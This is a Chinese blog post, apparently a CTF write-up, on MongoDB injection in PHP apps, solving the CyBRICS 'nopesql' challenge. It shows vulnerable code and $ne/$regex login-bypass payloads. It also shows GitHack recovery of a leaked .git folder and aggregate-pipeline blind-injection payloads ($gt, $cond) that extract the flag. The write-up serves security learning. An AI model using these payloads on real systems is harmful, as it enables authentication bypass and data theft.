<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/1.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/1.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="基础,">





  <link rel="alternate" href="/atom.xml" title="木偶's blog" type="application/atom+xml">






<meta name="description" content="mongodb注入cybircsctf的一道nopesql，开始没想到是mongodb注入，某天惊奇地发现题目还没关，复现一下，学习一下mongodb注入">
<meta name="keywords" content="基础">
<meta property="og:type" content="article">
<meta property="og:title" content="mongodb注入">
<meta property="og:url" content="http://yoursite.com/2019/08/13/mongodb注入/index.html">
<meta property="og:site_name" content="木偶&#39;s blog">
<meta property="og:description" content="mongodb注入cybircsctf的一道nopesql，开始没想到是mongodb注入，某天惊奇地发现题目还没关，复现一下，学习一下mongodb注入">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://yoursite.com/2019/08/13/mongodb注入/1.png">
<meta property="og:image" content="http://yoursite.com/2019/08/13/mongodb注入/2.png">
<meta property="og:image" content="http://yoursite.com/2019/08/13/mongodb注入/3.png">
<meta property="og:updated_time" content="2019-08-14T05:44:27.634Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="mongodb注入">
<meta name="twitter:description" content="mongodb注入cybircsctf的一道nopesql，开始没想到是mongodb注入，某天惊奇地发现题目还没关，复现一下，学习一下mongodb注入">
<meta name="twitter:image" content="http://yoursite.com/2019/08/13/mongodb注入/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/08/13/mongodb注入/">





  <title>mongodb注入 | 木偶's blog</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
<a href="https://github.com/muouim/muouim.github.io.git" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewbox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"/><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"/><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"/></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">木偶's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/08/13/mongodb注入/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="木偶">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="木偶's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">mongodb注入</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-08-13T18:34:25+08:00">
                2019-08-13
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/基础/" itemprop="url" rel="index">
                    <span itemprop="name">基础</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2019/08/13/mongodb注入/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count valine-comment-count" data-xid="/2019/08/13/mongodb注入/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  2.2k 字
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  10 分钟
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="mongodb注入"><a href="#mongodb注入" class="headerlink" title="mongodb注入"></a>mongodb注入</h2><p>cybircsctf的一道nopesql，开始没想到是mongodb注入，某天惊奇地发现题目还没关，复现一下，学习一下mongodb注入</p>
<a id="more"></a>
<h3 id="mongodb"><a href="#mongodb" class="headerlink" title="mongodb"></a>mongodb</h3><p>参考链接：<a href="http://www.vuln.cn/6354" target="_blank" rel="noopener">http://www.vuln.cn/6354</a><br>1.用mongo类中相应的方法执行增查减改，传递进入的参数是一个数组：</p>
<pre><code>&lt;?php

$mongo = new mongoclient();

$db = $mongo-&gt;myinfo; //选择数据库

$coll = $db-&gt;test; //选择集合

$coll-&gt;save();    //增

$coll-&gt;find();    //查

$coll-&gt;remove();    //减

$coll-&gt;update();    //改
</code></pre><p>2.用execute方法执行字符串 传递进入的参数是query的值：</p>
<pre><code>#!php
&lt;?php

$mongo = new mongoclient();

$db = $mongo-&gt;myinfo; //选择数据库

$query = &quot;db.table.save({&apos;newsid&apos;:1})&quot;;    //增

$query = &quot;db.table.find({&apos;newsid&apos;:1})&quot;;    //查

$query = &quot;db.table.remove({&apos;newsid&apos;:1})&quot;;    //减

$query = &quot;db.table.update({&apos;newsid&apos;:1},{&apos;newsid&apos;,2})&quot;;    改

$result = $db-&gt;execute($query);
</code></pre><h3 id="shell和php"><a href="#shell和php" class="headerlink" title="shell和php"></a>shell和php</h3><pre><code>php语句
$db-&gt;find([&quot;num&quot;=&gt;[&apos;$gt&apos;=&gt;2],&quot;name&quot;=&gt;&quot;test_3&quot;])
shell语句
b.tr1ple.find({&apos;num&apos;:{&quot;$gt&quot;:2},&apos;name&apos;:&apos;test_3&apos;})
相当于sql语句
select * from tr1ple where num&gt;2 and name=&quot;test_3&quot;
</code></pre><h3 id="注入方式"><a href="#注入方式" class="headerlink" title="注入方式"></a>注入方式</h3><h4 id="数组注入"><a href="#数组注入" class="headerlink" title="数组注入"></a>数组注入</h4><pre><code>#!php
&lt;?php
$mongo = new mongoclient();
$db = $mongo-&gt;myinfo; //选择数据库
$coll = $db-&gt;test; //选择集合
$username = $_GET[&apos;username&apos;];
$password = $_GET[&apos;password&apos;];
$data = array(
        &apos;username&apos;=&gt;$username,
        &apos;password&apos;=&gt;$password
        );
$data = $coll-&gt;find($data);
$count = $data-&gt;count();
if ($count&gt;0) {
    foreach ($data as $user) {
        echo &apos;username:&apos;.$user[&apos;username&apos;].&quot;&lt;/br&gt;&quot;;
        echo &apos;password:&apos;.$user[&apos;password&apos;].&quot;&lt;/br&gt;&quot;;
    }
}
else{
    echo &apos;未找到&apos;;
}
?&gt;
</code></pre><p>此时我们传递参数</p>
<pre><code>?username=test&amp;password=test
</code></pre><p>相当于执行了查询语句</p>
<pre><code>db-&gt;test-&gt;find({username:’test’,password:’test’});
</code></pre><p>并且输出查询的内容<br>而我们要注入的语句是</p>
<pre><code>?username[$ne]=test&amp;password[$ne]=test
</code></pre><p>相当于执行了</p>
<pre><code>db.test.find({username:{‘$ne’:’test’},password:{‘$ne’:’test’}});  
</code></pre><p>mongodb条件操作符<br>“$lt”, “$lte”, “$gt”, “$gte”, “$ne”对应了  “&lt;”, “&lt;=”, “&gt;”, “&gt;=”,”!=”。<br>相当于对username!=test，password!=test的查询<br>此处是字符的比较，比较的是字符的ascii值</p>
<pre><code>对应sql语句：select * from test where username!=’test’ and password!=’test’;
</code></pre><p>返回所有username!=test，password!=test的结果<br>如果读取后并没有回显，我们可以采取$regex操作符来一位一位获取数据。</p>
<pre><code>传递参数为 username[$regex]=^a
对应的操作为db.test.find({username:{‘$regex’:’^a’},password:{‘$regex’:’^a’}})
</code></pre><p>从第一位开始，^a,^a1,^a13 ……</p>
<h4 id="拼接字符串时的注入"><a href="#拼接字符串时的注入" class="headerlink" title="拼接字符串时的注入"></a>拼接字符串时的注入</h4><pre><code>#!php
&lt;?php
$username = $_GET[&apos;username&apos;];
$password = $_GET[&apos;password&apos;];
$query = &quot;var data = db.test.findOne({username:&apos;$username&apos;,password:&apos;$password&apos;});return data;&quot;;
//$query = &quot;return db.test.findOne();&quot;;
//echo $query;
$mongo = new mongoclient();
$db = $mongo-&gt;myinfo;
$data = $db-&gt;execute($query);
if ($data[&apos;ok&apos;] == 1) {
    if ($data[&apos;retval&apos;]!=NULL) {
        echo &apos;username:&apos;.$data[&apos;retval&apos;][&apos;username&apos;].&quot;&lt;/br&gt;&quot;;
        echo &apos;password:&apos;.$data[&apos;retval&apos;][&apos;password&apos;].&quot;&lt;/br&gt;&quot;;
    }else{
        echo &apos;未找到&apos;;
    }
}else{
    echo $data[&apos;errmsg&apos;];
}
?&gt;
</code></pre><p>和sql中堆叠注入有点像，将前面正常的语句闭合，加,后面的构造的语句依旧可以执行</p>
<h3 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h3><p>git源码泄露，大佬wp中学到的姿势，虽然它404了，但是我们可以看到.git后面加了/，虚假的404，可以用githack得到源码。<br><img src="/2019/08/13/mongodb注入/1.png" alt=" "></p>
<pre><code>GitHack是一个.git泄露利用脚本，通过泄露的.git文件夹下的文件，重建还原工程源代码。

渗透测试人员、攻击者，可以进一步审计代码，挖掘：文件上传，SQL注射等web安全漏洞。

工作原理

解析.git/index文件，找到工程中所有的： ( 文件名，文件sha1 )
去.git/objects/ 文件夹下下载对应的文件
zlib解压文件，按原始的目录结构写入源代码
</code></pre><p>命令：</p>
<pre><code>python git.py http://173.199.118.226/.git/
</code></pre><p>得到index.php源码：</p>
<h4 id="登陆部分"><a href="#登陆部分" class="headerlink" title="登陆部分"></a>登陆部分</h4><pre><code>&lt;?php
require_once __DIR__ . &quot;/vendor/autoload.php&quot;;

function auth($username, $password) {
    $collection = (new MongoDB\Client(&apos;mongodb://localhost:27017/&apos;))-&gt;test-&gt;users;
    $raw_query = &apos;{&quot;username&quot;: &quot;&apos;.$username.&apos;&quot;, &quot;password&quot;: &quot;&apos;.$password.&apos;&quot;}&apos;;
    $document = $collection-&gt;findOne(json_decode($raw_query));
    if (isset($document) &amp;&amp; isset($document-&gt;password)) {
        return true;
    }
    return false;
}

$user = false;
if (isset($_COOKIE[&apos;username&apos;]) &amp;&amp; isset($_COOKIE[&apos;password&apos;])) {
    $user = auth($_COOKIE[&apos;username&apos;], $_COOKIE[&apos;password&apos;]);
}

if (isset($_POST[&apos;username&apos;]) &amp;&amp; isset($_POST[&apos;password&apos;])) {
    $user = auth($_POST[&apos;username&apos;], $_POST[&apos;password&apos;]);
    if ($user) {
        setcookie(&apos;username&apos;, $_POST[&apos;username&apos;]);
        setcookie(&apos;password&apos;, $_POST[&apos;password&apos;]);
    }
}

?&gt;
</code></pre><p>我们观察到$raw_query处可以进行字符串的拼接： </p>
<pre><code>构造username:admin password=&quot;,&quot;password&quot;:{&quot;$ne&quot;:&quot;a&quot;},&quot;username&quot;:&quot;admin
或者password=&quot;,&quot;password&quot;:{&quot;$gt&quot;:&quot;a&quot;},&quot;username&quot;:&quot;admin
</code></pre><p>将前面语句闭合，并构造了新的查询，用户名为admin，password不为a，就可以返回true从而进行登陆</p>
<h4 id="查询部分"><a href="#查询部分" class="headerlink" title="查询部分"></a>查询部分</h4><pre><code>&lt;?php if ($user == true): ?&gt;

    Welcome!
    &lt;div&gt;
        Group most common news by
        &lt;a href=&quot;?filter=$category&quot;&gt;category&lt;/a&gt; | 
        &lt;a href=&quot;?filter=$public&quot;&gt;publicity&lt;/a&gt;&lt;br&gt;
    &lt;/div&gt;

    &lt;?php
        $filter = $_GET[&apos;filter&apos;];

        $collection = (new MongoDB\Client(&apos;mongodb://localhost:27017/&apos;))-&gt;test-&gt;news;

        $pipeline = [
            [&apos;$group&apos; =&gt; [&apos;_id&apos; =&gt; &apos;$category&apos;, &apos;count&apos; =&gt; [&apos;$sum&apos; =&gt; 1]]],
            [&apos;$sort&apos; =&gt; [&apos;count&apos; =&gt; -1]],
            [&apos;$limit&apos; =&gt; 5],
        ];

        $filters = [
            [&apos;$project&apos; =&gt; [&apos;category&apos; =&gt; $filter]]
        ];

        $cursor = $collection-&gt;aggregate(array_merge($filters, $pipeline));
    ?&gt;

    &lt;?php if (isset($filter)): ?&gt;

        &lt;?php
            foreach ($cursor as $category) {
                    printf(&quot;%s has %d news&lt;br&gt;&quot;, $category[&apos;_id&apos;], $category[&apos;count&apos;]);
            }
        ?&gt;

    &lt;?php endif; ?&gt;

&lt;?php else: ?&gt;

    &lt;?php if (isset($_POST[&apos;username&apos;]) &amp;&amp; isset($_POST[&apos;password&apos;])): ?&gt;
        Invalid username or password
    &lt;?php endif; ?&gt;

    &lt;form action=&apos;/&apos; method=&quot;POST&quot;&gt;
        &lt;input type=&quot;text&quot; name=&quot;username&quot;&gt;
        &lt;input type=&quot;password&quot; name=&quot;password&quot;&gt;
        &lt;input type=&quot;submit&quot;&gt;
    &lt;/form&gt;

    &lt;h2&gt;News&lt;/h2&gt;
    &lt;?php
        $collection = (new MongoDB\Client(&apos;mongodb://localhost:27017/&apos;))-&gt;test-&gt;news;
        $cursor = $collection-&gt;find([&apos;public&apos; =&gt; 1]);
        foreach ($cursor as $news) {
            printf(&quot;%s&lt;br&gt;&quot;, $news[&apos;title&apos;]);
        }
    ?&gt;

&lt;?php endif; ?&gt;
</code></pre><p>MongoDB中聚合(aggregate)主要用于处理数据(诸如统计平均值,求和等)，并返回计算后的数据结果,有点类似sql语句中的count(*)。MongoDB的管道将MongoDB文档在一个管道处理完毕后将结果传递给下一个管道处理。管道操作是可以重复的，以下是几个管道相关操作中的表达式：<br>  $project:修改输入文档的结构。可以用来重命名、增加或删除域，也可以用于创建计算结果以及嵌套文档，可以把它当作指定域，因为默认find()函数将范围集合中所有的域的数据(可以把它当作SQL里面的字段来理解)。<br>  $limit:用来限制MongoDB聚合管道返回的文档数。<br>  $group:将集合中的文档分组，可用于统计结果。<br>  $sort:将输入文档排序后输出。(使用1和-1来指定排序的方式,其中1为升序排列,而-1是用于降序排列)  </p>
<p>首先我们来理解一下<br>1</p>
<pre><code>$pipeline = [
            [&apos;$group&apos; =&gt; [&apos;_id&apos; =&gt; &apos;$category&apos;, &apos;count&apos; =&gt; [&apos;$sum&apos; =&gt; 1]]],
            [&apos;$sort&apos; =&gt; [&apos;count&apos; =&gt; -1]],//降序输出
            [&apos;$limit&apos; =&gt; 5],//限制返回文档数为5
        ];
&apos;_id&apos; =&gt; &apos;$category&apos;前面的情况出现一次，$sum值+1(如果是=&gt;2的话+2)，并赋值给count

{ $group: { _id：&quot;$分组字段名&quot;, 显示字段名: { 聚集函数: &quot;$字段名&quot;}，[显示字段名2: { 聚集函数: &quot;$字段名&quot;}, ...] } }
</code></pre><p>2</p>
<pre><code>$filters = [
            [&apos;$project&apos; =&gt; [&apos;category&apos; =&gt; $filter]]
        ];
对category进行了重命名
</code></pre><p>3 </p>
<pre><code>$cursor = $collection-&gt;aggregate(array_merge($filters, $pipeline));
array_merge() 函数把一个或多个数组合并为一个数组。
</code></pre><p>4</p>
<pre><code>foreach ($cursor as $category) {
                    printf(&quot;%s has %d news&lt;br&gt;&quot;, $category[&apos;_id&apos;], $category[&apos;count&apos;]);}
将cursor中所有组遍历赋值给category，打印其中_id和count
</code></pre><p>我们传递filter参数，并把其值作为分组字段，返回各分组信息，当filter=$category ,我们可以看到他输出的结果是</p>
<pre><code>Welcome! 
Group most common news by category | publicity

politics has 9 news
flags has 9 news
finance has 5 news
comedy has 5 news
</code></pre><p>测试发现category还可以是$_id，$text，$title，但是limit的限制没法打印text中的flag</p>
<h4 id="数组盲注"><a href="#数组盲注" class="headerlink" title="数组盲注"></a>数组盲注</h4><p>需要传递两个参数，而且前后$内容要一致</p>
<pre><code>?filter[$gt][0]=$text&amp;filter[$gt][1]=c
</code></pre><p>相当于</p>
<pre><code>[&apos;$project&apos; =&gt; [&apos;category&apos; =&gt; [$gt =&gt; [&quot;text&quot;, &quot;c&quot;]]]]
后面的c为text分组内的内容，所以前后参数都要为$gt
</code></pre><p>payload是</p>
<pre><code>?filter[$gt][0]=$text&amp;filter[$gt][1]=cy
</code></pre><p>显示<br><img src="/2019/08/13/mongodb注入/2.png" alt=" "></p>
<pre><code>?filter[$gt][0]=$text&amp;filter[$gt][1]=cz
</code></pre><p>则显示<br><img src="/2019/08/13/mongodb注入/3.png" alt=" "></p>
<p>就可以写脚本得到flag</p>
<p>得到flag后也可以对此进行验证<br>    ?filter[$ne][0]=$text&amp;filter[$ne][1]=cybrics{7|-|15 15 4 7E&gt;&lt;7 |=|_49}</p>
<h4 id="拼接字符注入"><a href="#拼接字符注入" class="headerlink" title="拼接字符注入"></a>拼接字符注入</h4><p>在mongodb的aggregate中，可以使用$cond进行条件语句：<br>    [$cond][if][$eq]条件语句</p>
<pre><code>?filter[$cond][if][$eq][0]=$category&amp;filter[$cond][if][$eq][1]=flags&amp;filter[$cond][then]=$text&amp;filter[$cond][else]=$category
</code></pre><p>我们直接输出flag中的text内容，$category和他分组内的内容要在同一数组中</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/基础/" rel="tag"># 基础</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/08/13/php反序列化/" rel="next" title="php反序列化">
                <i class="fa fa-chevron-left"></i> php反序列化
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">木偶</p>
              <p class="site-description motion-element" itemprop="description">一个零基础小白的成长记录。</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">21</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/yourname" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://twitter.com/yourname" target="_blank" title="Twitter">
                      
                        <i class="fa fa-fw fa-twitter"></i>Twitter</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="http://weibo.com/your-user-name" target="_blank" title="微博">
                      
                        <i class="fa fa-fw fa-globe"></i>微博</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="http://www.zhihu.com/people/your-user-name" target="_blank" title="知乎">
                      
                        <i class="fa fa-fw fa-globe"></i>知乎</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://evi0s.com/" title="evi0s" target="_blank">evi0s</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.northity.com/" title="北方" target="_blank">北方</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://47.107.115.177/" title="Wine" target="_blank">Wine</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.blacsheep.cn/" title="澜洲" target="_blank">澜洲</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.bdwms.com/" title="bdwms" target="_blank">bdwms</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://mitah.cn/" title="老大" target="_blank">老大</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://blog.cyru1s.com/" title="方姐姐" target="_blank">方姐姐</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://xr1s.me/" title="叶姐姐" target="_blank">叶姐姐</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://ccdragon.cc/" title="戳戳龙" target="_blank">戳戳龙</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#mongodb注入"><span class="nav-number">1.</span> <span class="nav-text">mongodb注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#mongodb"><span class="nav-number">1.1.</span> <span class="nav-text">mongodb</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#shell和php"><span class="nav-number">1.2.</span> <span class="nav-text">shell和php</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#注入方式"><span class="nav-number">1.3.</span> <span class="nav-text">注入方式</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#数组注入"><span class="nav-number">1.3.1.</span> <span class="nav-text">数组注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#拼接字符串时的注入"><span class="nav-number">1.3.2.</span> <span class="nav-text">拼接字符串时的注入</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#题目"><span class="nav-number">1.4.</span> <span class="nav-text">题目</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#登陆部分"><span class="nav-number">1.4.1.</span> <span class="nav-text">登陆部分</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#查询部分"><span class="nav-number">1.4.2.</span> <span class="nav-text">查询部分</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#数组盲注"><span class="nav-number">1.4.3.</span> <span class="nav-text">数组盲注</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#拼接字符注入"><span class="nav-number">1.4.4.</span> <span class="nav-text">拼接字符注入</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2018 &mdash; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">木偶</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
